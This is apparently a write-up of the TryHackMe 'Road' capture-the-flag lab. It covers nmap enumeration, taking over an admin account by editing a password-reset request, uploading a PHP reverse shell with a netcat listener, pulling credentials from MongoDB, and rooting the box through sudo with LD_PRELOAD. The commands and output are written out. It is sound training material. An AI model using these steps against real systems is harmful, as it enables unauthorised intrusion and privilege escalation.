/ TRYHACKME, CTF, MEDIUM

Road Write Up

cover

Overview

Road is a medium rated CTF room on TryHackMe created by StillNoob. Although rated as medium I would put it down as easy as the *cough* road is nicely laid out for you.

Nmap

I started a nmap scan to check for available ports.

└──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.149.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-29 09:52 GMT
Nmap scan report for 10.10.149.149
Host is up (0.055s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e6:dc:88:69:de:a1:73:8e:84:5b:a1:3e:27:9f:07:24 (RSA)
|   256 6b:ea:18:5d:8d:c7:9e:9a:01:2c:dd:50:c5:f8:c8:05 (ECDSA)
|_  256 ef:06:d7:e4:b1:65:15:6e:94:62:cc:dd:f0:8a:1a:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds

2 ports open:

  • 22 - SSH - Openssh 8.2p1
  • 80 - HTTP - Apache httpd 2.4.41

I did a second nmap scan on all ports but no other ports were open.

Enumeration

Taking a look at the web server shows a simple courier web page.

homepage

I tested the track order search but it didn’t do anything so I moved on and clicked merchant central which took me to a login form.

login

I tried a few common credentials combinations but had no joy so registered my own account.

createuser

Once in I got access to a static dashboard, none of the links on the left worked other than ‘ResetUser’. However I could view my profile.

dashboard

The only option available was to upload an image, however this needs be done my the admin. But now I have the admins email I might be able to use the reset user function to reset the admin’s password.

profile

On the ResetUser page the username is grey out but I put in a new password and opened Burp. With Intercept on I submitted the request.

resetuser

In Burp I can see my account name but no protection mechanisms.

pwreset

I changed the username to the admin account and forward the request.

adminpwreset

I now have access to the admin account!

admindashboard

Initial Access

Now I have access to the admin account, I should be able to upload a file. The site is using PHP so I tried uploading a php reverse shell. I copied a PHP reverse shell to my directory and edited the IP and port.

└──╼ $cp /usr/share/webshells/php/php-reverse-shell.php .
┌─[daz@parrotos]─[~/Documents/TryHackMe/Road]
└──╼ $mv php-reverse-shell.php shell.php

I then uploaded the file and started a listener using the command ‘nc -nvlp 4444’.

upload

The profile picture (top right) hasn’t changed or error’d, so I inspect the element to show the src reference.

profilesource

My upload is not in the assets folder.

assets

However, looking at the source code for the profile page ‘http://10.10.149.149/v2/profile.php’ is a comment with a path for profile images.

sourcecode

The first time I scanned the source code I missed the comment, using curl is a quick and crude way of pulling all the comments off a web page which can be useful with a large web page.

└──╼ $curl -s http://10.10.149.149/v2/profile.php | grep '<!--'
    <!--<link rel="stylesheet" href="../assets/css/bootstrap.min.css" crossorigin="anonymous">-->
  <!-- <script src="/assets/js/dataTable.min.js"></script> -->
                    <!-- <div class="alert alert-danger">Take action</div> -->
          <!-- </ul> -->
<!-- /v2/profileimages/ -->
<!-- Include Required Prerequisites -->
<!-- Include Date Range Picker -->

Going to the path, I can list the images however I know I named my file shell.php so I navigate to ‘http://10.10.149.149/v2/profileimages/shell.php’.

profileimages

I have a shell!

└──╼ $nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.8.21.217] from (UNKNOWN) [10.10.149.149] 59984
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 10:20:14 up 32 min,  0 users,  load average: 0.00, 0.02, 0.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Priv Esc 1

I got a shell as www-data, I can use this to grab the user.txt flag but I need to now find a way to become the webdeveloper user.

$ whoami
www-data
$ cd /home/
$ ls
webdeveloper
$ cd webdeveloper
$ ls -lah
total 36K
drwxr-xr-x 4 webdeveloper webdeveloper 4.0K Oct  8 10:59 .
drwxr-xr-x 3 root         root         4.0K May 25  2021 ..
lrwxrwxrwx 1 webdeveloper webdeveloper    9 May 25  2021 .bash_history -> /dev/null
-rw-r--r-- 1 webdeveloper webdeveloper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 webdeveloper webdeveloper 3.7K Feb 25  2020 .bashrc
drwx------ 2 webdeveloper webdeveloper 4.0K May 25  2021 .cache
drwxrwxr-x 3 webdeveloper webdeveloper 4.0K May 25  2021 .local
-rw------- 1 webdeveloper webdeveloper   51 Oct  8 10:59 .mysql_history
-rw-r--r-- 1 webdeveloper webdeveloper  807 Feb 25  2020 .profile
-rw-r--r-- 1 webdeveloper webdeveloper    0 Oct  7 17:53 .sudo_as_admin_successful
-rw-r--r-- 1 webdeveloper webdeveloper   33 May 25  2021 user.txt

I enumerate the box and take a look at the listening ports and find MongoDB is listening on 27017.

$ ss -tulp
Netid State  Recv-Q Send-Q      Local Address:Port    Peer Address:Port Process
udp   UNCONN 0      0           127.0.0.53%lo:domain       0.0.0.0:*           
udp   UNCONN 0      0      10.10.149.149%eth0:bootpc       0.0.0.0:*           
tcp   LISTEN 0      511             127.0.0.1:9000         0.0.0.0:*           
tcp   LISTEN 0      4096            127.0.0.1:27017        0.0.0.0:*           
tcp   LISTEN 0      151             127.0.0.1:mysql        0.0.0.0:*           
tcp   LISTEN 0      4096        127.0.0.53%lo:domain       0.0.0.0:*           
tcp   LISTEN 0      128               0.0.0.0:ssh          0.0.0.0:*           
tcp   LISTEN 0      70              127.0.0.1:33060        0.0.0.0:*           
tcp   LISTEN 0      511                     *:http               *:*           
tcp   LISTEN 0      128                  [::]:ssh             [::]:*           
$

Connecting to mongo I found the webdeveloper credentials, Ive redacted them in the output below.

$ mongo
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("0ad03a25-0c2d-4c46-8adf-bb97086a2f15") }
MongoDB server version: 4.4.6
show dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
use backup
switched to db backup
show collections
collection
user
db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
exit
bye
Error saving history file: FileOpenFailed Unable to open() file /var/www/.dbshell: Permission denied
$

I can now SSH in to the machine as webdeveloper.

└──╼ $ssh webdeveloper@10.10.149.149
The authenticity of host '10.10.149.149 (10.10.149.149)' can't be established.
ECDSA key fingerprint is SHA256:zSoCEcBBY73hNL9ItPA4CnB/405/W6GQYsl94qRMkOo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.149.149' (ECDSA) to the list of known hosts.
webdeveloper@10.10.149.149's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 29 Nov 2021 10:26:45 AM UTC

  System load:  0.0               Processes:             121
  Usage of /:   60.0% of 9.78GB   Users logged in:       0
  Memory usage: 63%               IPv4 address for eth0: 10.10.149.149
  Swap usage:   0%


185 updates can be installed immediately.
100 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct  8 10:52:42 2021 from 192.168.0.105
webdeveloper@sky:~$

Priv Esc 2

Once connected as webdeveloper I did ‘sudo -l’, there is a binary the user can run that could be vulnerable however LD_PRELOAD is configured which could also provide a path to priv esc.

webdeveloper@sky:~$ sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
webdeveloper@sky:~$

Using the article at Hacking Articles provides a great step by step on how to exploit this. I created the shell.c file as per the article and run the sudo command to become root!

webdeveloper@sky:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
webdeveloper@sky:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#

Thanks for reading!

============================================================

Any comments or feedback welcome! You can find me on twitter.

Buy Me A Coffee